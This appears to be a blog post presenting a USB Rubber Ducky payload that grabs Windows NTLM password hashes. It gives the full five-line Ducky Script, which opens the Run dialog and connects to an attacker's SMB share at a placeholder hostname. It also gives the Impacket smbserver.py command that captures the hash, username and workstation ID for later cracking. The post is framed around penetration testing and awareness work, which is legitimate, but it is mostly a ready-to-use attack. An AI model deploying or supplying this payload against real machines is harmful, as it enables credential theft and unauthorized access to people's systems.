Using a USB Rubber Ducky and this simple payload, Windows password hashes can be captured for cracking in less than two seconds.
This technique works against almost all versions of Microsoft Windows and only requires a 5 line Ducky Script and an open source server setup on the target network.
KILLER EFFORT:REWARD RATIO
This is actually one of my favorite USB Rubber Ducky payloads for policy compliance and information security awareness. It leverages built in functionality of the Microsoft Windows operating system, requires next to nothing in terms of privileges, and executes faster than a user could reasonably thwart the attack by unplugging the seemingly benign "USB Thumbdrive".
The intel gained from this extremely quick attack is also of great value to any penetration tester or internal red team. Timestamp, workstation ID, user and even NTLM hash. What's not to love?
WHAT YOU'LL NEED
- Impacket's smbserver.py
- This 5 line ducky script
- A USB Rubber Ducky
THE DUCKY SCRIPT
REM Super Quick Hash Grab Payload for USB Rubber Ducky REM Target: Windows 9X and beyond! Author: Hak5Darren DELAY 1000 GUI r DELAY 100 STRING \\hostname ENTER
That's literally it. Just replace hostname with the hostname or IP address of your listening server running Impacket's smbserver.py
This USB Rubber Ducky payload attempts to access an SMB share on the network - \\hostname. When Windows attempts to open this share, part of the process is passing its NTLM network hash, along with its hostname (workstation ID) and username. Of course you'll also get the timestamp. What more could one ask for?
Rather than using an actual SMB server - we'll want to use Impacket's smbserver.py since it'll allow us to easily capture all of this information. The basic usage is to supply a share name and point it at a directly. This can be anything really - from tmp /tmp/ to "YOU'VE BROKEN COMPANY USB POLICY. IT WILL CONTACT YOU SOON" /stuff/
impacket/examples/smbserver.py tmp /tmp/
Have fun with that one.
Now of course this payload will work best when you have the listening smb server on the target LAN, as most good firewalls will prevent SMB access over the Internet. At least - they should... ;-)